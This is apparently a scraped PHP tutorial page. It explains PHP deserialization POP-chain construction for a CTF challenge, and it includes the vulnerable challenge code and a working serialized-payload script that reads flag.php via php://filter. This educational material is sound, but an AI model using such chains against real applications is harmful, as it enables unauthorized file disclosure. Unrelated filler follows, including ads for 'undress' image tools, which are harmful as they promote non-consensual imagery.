


Detailed introduction to the knowledge points of PHP deserialization pop chain construction
This article brings you relevant knowledge about PHP, which mainly introduces related issues about pop chain construction. Pop chain is a kind of attribute-oriented programming, which is often used to construct call chains. Let’s take a look at the method below, I hope it will be helpful to everyone.
Recommended learning: "PHP Video Tutorial"
As we continue to learn more about deserialization, let's learn about it The structure of the pop chain. This pop chain is still difficult to understand for a novice like me. I will write this article again to summarize it and deepen my understanding of constructing pop chains. At the same time, it also provides some understanding to friends who want to join the trap.
pop chain construction
General deserialization problems, where there are loopholes or where malicious code can be injected are in the magic method. We can automatically call the magic method. achieve attack effect. But when the injection point exists in an ordinary class method, the method automatically called before will be invalid, so we need to find the connection between the ordinary class and the magic method, figure out a logical idea, and use this logical idea to construct a pop chain to achieve the purpose of attack. Therefore, when we are doing this kind of pop questions, we must pay close attention to the magic method.
Introduction to pop chain
It is a method of attribute-oriented programming that is often used to construct call chains. Find a series of instructions that can be called in the code in the question, and integrate these instructions into a logical code that can achieve malicious attack effects, which is the pop chain (personal understanding, masters are welcome to give opinions) in constructing the pop chain , magic methods are essential. The following will use an example to explain how the pop chain is constructed, as well as the specific construction ideas.
The above question code:
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source."<br>"; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { echo "hacker"; $this->source = "index.php"; } } } class Test{ public $p; public function __construct(){ $this->p = array(); } public function __get($key){ $function = $this->p; return $function(); } } if(isset($_GET['pop'])){ @unserialize($_GET['pop']); } else{ $a=new Show; highlight_file(__FILE__); }
Construction ideas
When constructing the call chain, First find the head and tail of the call chain. The header is generally a place where parameters can be passed and deserialized, while the tail is generally a place where malicious code can be executed. When auditing the code for this question, the header uses the get method to pass parameters to pop, and the tail includes the include function. At this point, we should all know that we need to use the PHP pseudo-protocol to read the source code of the flag file. Now that the head and tail are found, we also know the attack method. Then find the magic method in the question.
__invoke() 当一个类被当作函数执行时调用此方法。 __construct 在创建对象时调用此方法 __toString() 在一个类被当作字符串处理时调用此方法 __wakeup() 当反序列化恢复成对象时调用此方法 __get() 当读取不可访问或不存在的属性的值会被调用
There are a total of these five magic methods in the question. Then find the connection between ordinary classes and magic methods.
It is not difficult to see that there is a preg_match function in the wakeup function, which is used to find sensitive strings in the source. We can start from here and assign the source to a show class, then the toString function will be automatically triggered, so now To extend the chain in the tostring method, we can assign $this->str to the test class in the tostring method, and read the source variable in the test class (because there is no source attribute in the test class, an inaccessible attribute is accessed ) will automatically call the get magic method. It can be found that there is a function call in the get method, then we can assign $this->p to the Modifier class, and the invoke method will be automatically called to execute the PHP pseudo-protocol we wrote (assign the var attribute in the Modifer class to our Malicious code)
At this point, we construct the pop chain.
pop chain explanation
<?php class Modifier { protected $var='php://filter/read=convert.base64-encode/resource=flag.php'; } class Show{ public $source; public $str; function _construct(){ $this->source=$file; } } class Test{ public $p; } $a = new show(); $b = new show(); $c = new test(); $d = new Modifier(); $a->source=$b; $b->str=$c; $c->p= $d; echo urlencode(serialize($a)); ?>
First write out the classes used to form a framework, and then indicate the variables in the classes. Instantiate the classes used separately. Why do you need to use new show twice? (You should be able to understand by looking at the code. The first time is to instantiate the show class, and the second time is to instantiate the show class after the first instantiation. source = second instantiation of show)
Try to use URL encoding when we serialize (there are protected modified attributes in this question, and there will be invisible characters)
Recommended learning: "PHP video tutorial"
The above is the detailed content of Detailed introduction to the knowledge points of PHP deserialization pop chain construction. For more information, please follow other related articles on the PHP Chinese website!

What’s still popular is the ease of use, flexibility and a strong ecosystem. 1) Ease of use and simple syntax make it the first choice for beginners. 2) Closely integrated with web development, excellent interaction with HTTP requests and database. 3) The huge ecosystem provides a wealth of tools and libraries. 4) Active community and open source nature adapts them to new needs and technology trends.

PHP and Python are both high-level programming languages that are widely used in web development, data processing and automation tasks. 1.PHP is often used to build dynamic websites and content management systems, while Python is often used to build web frameworks and data science. 2.PHP uses echo to output content, Python uses print. 3. Both support object-oriented programming, but the syntax and keywords are different. 4. PHP supports weak type conversion, while Python is more stringent. 5. PHP performance optimization includes using OPcache and asynchronous programming, while Python uses cProfile and asynchronous programming.

PHP is mainly procedural programming, but also supports object-oriented programming (OOP); Python supports a variety of paradigms, including OOP, functional and procedural programming. PHP is suitable for web development, and Python is suitable for a variety of applications such as data analysis and machine learning.

PHP originated in 1994 and was developed by RasmusLerdorf. It was originally used to track website visitors and gradually evolved into a server-side scripting language and was widely used in web development. Python was developed by Guidovan Rossum in the late 1980s and was first released in 1991. It emphasizes code readability and simplicity, and is suitable for scientific computing, data analysis and other fields.

PHP is suitable for web development and rapid prototyping, and Python is suitable for data science and machine learning. 1.PHP is used for dynamic web development, with simple syntax and suitable for rapid development. 2. Python has concise syntax, is suitable for multiple fields, and has a strong library ecosystem.

PHP remains important in the modernization process because it supports a large number of websites and applications and adapts to development needs through frameworks. 1.PHP7 improves performance and introduces new features. 2. Modern frameworks such as Laravel, Symfony and CodeIgniter simplify development and improve code quality. 3. Performance optimization and best practices further improve application efficiency.

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP type prompts to improve code quality and readability. 1) Scalar type tips: Since PHP7.0, basic data types are allowed to be specified in function parameters, such as int, float, etc. 2) Return type prompt: Ensure the consistency of the function return value type. 3) Union type prompt: Since PHP8.0, multiple types are allowed to be specified in function parameters or return values. 4) Nullable type prompt: Allows to include null values and handle functions that may return null values.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

Atom editor mac version download
The most popular open source editor

SublimeText3 Linux new version
SublimeText3 Linux latest version

mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

Zend Studio 13.0.1
Powerful PHP integrated development environment

SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.